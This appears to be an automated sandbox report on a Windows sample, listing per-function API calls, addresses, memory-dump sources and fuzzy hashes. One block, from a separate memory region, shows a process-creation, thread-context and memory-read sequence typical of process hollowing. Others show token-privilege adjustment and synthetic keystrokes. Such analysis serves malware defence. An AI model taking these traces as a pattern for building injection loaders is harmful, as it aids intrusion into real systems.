                                                                                        • IsThemeActive.UXTHEME ref: 00EE3A73
                                                                                          • Part of subcall function 00F01405: __lock.LIBCMT ref: 00F0140B
                                                                                          • Part of subcall function 00EE3ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00EE3AF3
                                                                                          • Part of subcall function 00EE3ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00EE3B08
                                                                                          • Part of subcall function 00EE3D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00EE3AA3,?), ref: 00EE3D45
                                                                                          • Part of subcall function 00EE3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00EE3AA3,?), ref: 00EE3D57
                                                                                          • Part of subcall function 00EE3D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00FA1148,00FA1130,?,?,?,?,00EE3AA3,?), ref: 00EE3DC8
                                                                                          • Part of subcall function 00EE3D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00EE3AA3,?), ref: 00EE3E48
                                                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00EE3AB3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                                        • String ID:
                                                                                        • API String ID: 924797094-0
                                                                                        APIs
                                                                                        • ___lock_fhandle.LIBCMT ref: 00F0EA29
                                                                                        • __close_nolock.LIBCMT ref: 00F0EA42
                                                                                          • Part of subcall function 00F07BDA: __getptd_noexit.LIBCMT ref: 00F07BDA
                                                                                          • Part of subcall function 00F07C0E: __getptd_noexit.LIBCMT ref: 00F07C0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                        • String ID:
                                                                                        • API String ID: 1046115767-0
                                                                                        APIs
                                                                                          • Part of subcall function 00F0395C: __FF_MSGBANNER.LIBCMT ref: 00F03973
                                                                                          • Part of subcall function 00F0395C: __NMSG_WRITE.LIBCMT ref: 00F0397A
                                                                                          • Part of subcall function 00F0395C: RtlAllocateHeap.NTDLL(01010000,00000000,00000001,00000001,00000000,?,?,00EFF507,?,0000000E), ref: 00F0399F
                                                                                        • std::exception::exception.LIBCMT ref: 00EFF51E
                                                                                        • __CxxThrowException@8.LIBCMT ref: 00EFF533
                                                                                          • Part of subcall function 00F06805: RaiseException.KERNEL32(?,?,0000000E,00F96A30,?,?,?,00EFF538,0000000E,00F96A30,?,00000001), ref: 00F06856
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 3902256705-0
                                                                                        APIs
                                                                                          • Part of subcall function 00F07C0E: __getptd_noexit.LIBCMT ref: 00F07C0E
                                                                                        • __lock_file.LIBCMT ref: 00F03629
                                                                                          • Part of subcall function 00F04E1C: __lock.LIBCMT ref: 00F04E3F
                                                                                        • __fclose_nolock.LIBCMT ref: 00F03634
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                        • String ID:
                                                                                        • API String ID: 2800547568-0
                                                                                        APIs
                                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 01057733
                                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 010577C9
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 010577EB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2160099918.0000000001055000.00000040.00000020.00020000.00000000.sdmp, Offset: 01055000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1055000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 2438371351-0
                                                                                        APIs
                                                                                        • __flush.LIBCMT ref: 00F02A0B
                                                                                          • Part of subcall function 00F07C0E: __getptd_noexit.LIBCMT ref: 00F07C0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __flush__getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 4101623367-0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 544645111-0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClearVariant
                                                                                        • String ID:
                                                                                        • API String ID: 1473721057-0
                                                                                        APIs
                                                                                          • Part of subcall function 00EE4214: FreeLibrary.KERNEL32(00000000,?), ref: 00EE4247
                                                                                        • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00EE39FE,?,00000001), ref: 00EE41DB
                                                                                          • Part of subcall function 00EE4291: FreeLibrary.KERNEL32(00000000), ref: 00EE42C4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$Free$Load
                                                                                        • String ID:
                                                                                        • API String ID: 2391024519-0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClearVariant
                                                                                        • String ID:
                                                                                        • API String ID: 1473721057-0
                                                                                        • Opcode ID: e8d62bd40e552a8bfa1c26eb667fa3ad2d0a49f73c3b937253aeb0e16f697d11
                                                                                        • Instruction ID: dbc5b0532043dc21f8e678d8c61412a3a5ccc6dffe62984b061a82e293a7f065
                                                                                        • Opcode Fuzzy Hash: e8d62bd40e552a8bfa1c26eb667fa3ad2d0a49f73c3b937253aeb0e16f697d11
                                                                                        • Instruction Fuzzy Hash: CB213970508609CFDB24DF28C444B2ABBF1BF84308F14596CFA9A67262D732E845DF52
                                                                                        APIs
                                                                                        • ___lock_fhandle.LIBCMT ref: 00F0AFC0
                                                                                          • Part of subcall function 00F07BDA: __getptd_noexit.LIBCMT ref: 00F07BDA
                                                                                          • Part of subcall function 00F07C0E: __getptd_noexit.LIBCMT ref: 00F07C0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __getptd_noexit$___lock_fhandle
                                                                                        • String ID:
                                                                                        • API String ID: 1144279405-0
                                                                                        • Opcode ID: 93ac559f995b420a31c8dad0a656a5987accb42be0100c87afe7ff4b573d7665
                                                                                        • Instruction ID: 3a4f920c20a56ddef456b85b01cc17d49052cff37d2a58f00622df9cabd1aa92
                                                                                        • Opcode Fuzzy Hash: 93ac559f995b420a31c8dad0a656a5987accb42be0100c87afe7ff4b573d7665
                                                                                        • Instruction Fuzzy Hash: E01182B2D057049BE7127FA4DC417593B619F81331F158680E4745F1E2DBB99D00BBA1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                                        • Instruction ID: ba135d45a42b4d89b4332bc8782dd38037c84ea09cb77db416f29f2d62eb283e
                                                                                        • Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                                        • Instruction Fuzzy Hash: 4A01867150014DAECF04EFA5C8818FEBBB4AF11304F008125B526A71E5EA309A49EF60
                                                                                        APIs
                                                                                        • __lock_file.LIBCMT ref: 00F02AED
                                                                                          • Part of subcall function 00F07C0E: __getptd_noexit.LIBCMT ref: 00F07C0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __getptd_noexit__lock_file
                                                                                        • String ID:
                                                                                        • API String ID: 2597487223-0
                                                                                        • Opcode ID: 1906923139ba6061332ae6d297eb222bc9866bd9657569b68fa95ff2923f0375
                                                                                        • Instruction ID: 0a7342a8a452ce7f701271ce68c77e638e28bb6c19dae18568f4c5b3277b8d77
                                                                                        • Opcode Fuzzy Hash: 1906923139ba6061332ae6d297eb222bc9866bd9657569b68fa95ff2923f0375
                                                                                        • Instruction Fuzzy Hash: 57F06271A00205AADF61BF64CC0A79F36A6BF40320F158415F414DA1D1DB7C8A62FB61
                                                                                        APIs
                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,00EE39FE,?,00000001), ref: 00EE4286
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary
                                                                                        • String ID:
                                                                                        • API String ID: 3664257935-0
                                                                                        • Opcode ID: 7b37b49e6dff2a35e7641fd8b86fa9267c0d9487a3f52456963c7a16bccf8dc0
                                                                                        • Instruction ID: 9dd1d8aeb1142755055d4683466885ee62c16513265aae5372e7a49b49be8efc
                                                                                        • Opcode Fuzzy Hash: 7b37b49e6dff2a35e7641fd8b86fa9267c0d9487a3f52456963c7a16bccf8dc0
                                                                                        • Instruction Fuzzy Hash: B8F0A0B0504346CFCB348F62E884812B7E4BF083193249A7EF2D692560C3719940DF40
                                                                                        APIs
                                                                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00EE40C6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongNamePath
                                                                                        • String ID:
                                                                                        • API String ID: 82841172-0
                                                                                        • Opcode ID: 9da6de72c1d1ff84a86aa628b6bc00ac5e0ac0201de83ea905012b589ae17471
                                                                                        • Instruction ID: 055361a122b6ac567b982209e75fa6824c576a52d1c2bc62e93cecbc93c77185
                                                                                        • Opcode Fuzzy Hash: 9da6de72c1d1ff84a86aa628b6bc00ac5e0ac0201de83ea905012b589ae17471
                                                                                        • Instruction Fuzzy Hash: 07E0C236A002285BC721A659DC46FEE77EDDF886A0F0940B5F909E7244DAA4A981A690
                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(000001F4), ref: 01057F89
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2160099918.0000000001055000.00000040.00000020.00020000.00000000.sdmp, Offset: 01055000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1055000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID:
                                                                                        • API String ID: 3472027048-0
                                                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                        • Instruction ID: 058ecf1af591f1be9f0a72bd976148d1942cb652dfbbca1a4b8fd06ae194951b
                                                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                        • Instruction Fuzzy Hash: 21E0E67494410DDFDB00DFB8D5496EE7BB4EF04301F1001A1FD05D2280D6309D609A62
                                                                                        APIs
                                                                                          • Part of subcall function 00EFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00EFB35F
                                                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 00F4F87D
                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F4F8DC
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00F4F919
                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F4F940
                                                                                        • SendMessageW.USER32 ref: 00F4F966
                                                                                        • _wcsncpy.LIBCMT ref: 00F4F9D2
                                                                                        • GetKeyState.USER32(00000011), ref: 00F4F9F3
                                                                                        • GetKeyState.USER32(00000009), ref: 00F4FA00
                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F4FA16
                                                                                        • GetKeyState.USER32(00000010), ref: 00F4FA20
                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F4FA4F
                                                                                        • SendMessageW.USER32 ref: 00F4FA72
                                                                                        • SendMessageW.USER32(?,00001030,?,00F4E059), ref: 00F4FB6F
                                                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 00F4FB85
                                                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00F4FB96
                                                                                        • SetCapture.USER32(?), ref: 00F4FB9F
                                                                                        • ClientToScreen.USER32(?,?), ref: 00F4FC03
                                                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00F4FC0F
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00F4FC29
                                                                                        • ReleaseCapture.USER32 ref: 00F4FC34
                                                                                        • GetCursorPos.USER32(?), ref: 00F4FC69
                                                                                        • ScreenToClient.USER32(?,?), ref: 00F4FC76
                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F4FCD8
                                                                                        • SendMessageW.USER32 ref: 00F4FD02
                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F4FD41
                                                                                        • SendMessageW.USER32 ref: 00F4FD6C
                                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00F4FD84
                                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00F4FD8F
                                                                                        • GetCursorPos.USER32(?), ref: 00F4FDB0
                                                                                        • ScreenToClient.USER32(?,?), ref: 00F4FDBD
                                                                                        • GetParent.USER32(?), ref: 00F4FDD9
                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F4FE3F
                                                                                        • SendMessageW.USER32 ref: 00F4FE6F
                                                                                        • ClientToScreen.USER32(?,?), ref: 00F4FEC5
                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00F4FEF1
                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F4FF19
                                                                                        • SendMessageW.USER32 ref: 00F4FF3C
                                                                                        • ClientToScreen.USER32(?,?), ref: 00F4FF86
                                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00F4FFB6
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00F5004B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                        • String ID: @GUI_DRAGID$F
                                                                                        • API String ID: 2516578528-4164748364
                                                                                        • Opcode ID: 668f52426cdfe5074ad72795f09e37f1205e54d5712615bc64bd1eb88f18b11e
                                                                                        • Instruction ID: 282b28e132f735181092b9a7ff253102b8611008d90041771580ee5b94b40e51
                                                                                        • Opcode Fuzzy Hash: 668f52426cdfe5074ad72795f09e37f1205e54d5712615bc64bd1eb88f18b11e
                                                                                        • Instruction Fuzzy Hash: AA32AE74A04249EFDB10CF64CC84BAABBE4FF49364F140629FA598B2A1C771DC49EB51
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00F4B1CD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: %d/%02d/%02d
                                                                                        • API String ID: 3850602802-328681919
                                                                                        • Opcode ID: 1deaa2ab63d65d92cde0b9556ed0928fc109913e25072309559262831d99cf72
                                                                                        • Instruction ID: da83436f478cae202bdc4126b71553a2244193f20ae963a4a06a7e794fe586b9
                                                                                        • Opcode Fuzzy Hash: 1deaa2ab63d65d92cde0b9556ed0928fc109913e25072309559262831d99cf72
                                                                                        • Instruction Fuzzy Hash: 4112BF71A40208ABEB248F65CC59FAA7FB8FF85320F104159F916EA2D1DBB5D901EB11
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32(00000000,00000000), ref: 00EFEB4A
                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F53AEA
                                                                                        • IsIconic.USER32(000000FF), ref: 00F53AF3
                                                                                        • ShowWindow.USER32(000000FF,00000009), ref: 00F53B00
                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 00F53B0A
                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F53B20
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00F53B27
                                                                                        • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00F53B33
                                                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00F53B44
                                                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00F53B4C
                                                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 00F53B54
                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 00F53B57
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F53B6C
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00F53B77
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F53B81
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00F53B86
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F53B8F
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00F53B94
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F53B9E
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00F53BA3
                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 00F53BA6
                                                                                        • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00F53BCD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                        • String ID: Shell_TrayWnd
                                                                                        • API String ID: 4125248594-2988720461
                                                                                        • Opcode ID: 0458b9a612bdaafc8f46667561f1338599abdc2e5ff5f8cec57c94bdc4023335
                                                                                        • Instruction ID: 37ee82c46d2b0b42c4f1d954c81695e7027e3a194436da0928af50afa2499b46
                                                                                        • Opcode Fuzzy Hash: 0458b9a612bdaafc8f46667561f1338599abdc2e5ff5f8cec57c94bdc4023335
                                                                                        • Instruction Fuzzy Hash: 773152B2F4021C7BEB215B658C49F7E7E6CEB84B91F144015FA05EA1D1D6F15D00BAA1
                                                                                        APIs
                                                                                          • Part of subcall function 00F1B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F1B180
                                                                                          • Part of subcall function 00F1B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F1B1AD
                                                                                          • Part of subcall function 00F1B134: GetLastError.KERNEL32 ref: 00F1B1BA
                                                                                        • _memset.LIBCMT ref: 00F1AD08
                                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00F1AD5A
                                                                                        • CloseHandle.KERNEL32(?), ref: 00F1AD6B
                                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00F1AD82
                                                                                        • GetProcessWindowStation.USER32 ref: 00F1AD9B
                                                                                        • SetProcessWindowStation.USER32(00000000), ref: 00F1ADA5
                                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00F1ADBF
                                                                                          • Part of subcall function 00F1AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F1ACC0), ref: 00F1AB99
                                                                                          • Part of subcall function 00F1AB84: CloseHandle.KERNEL32(?,?,00F1ACC0), ref: 00F1ABAB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
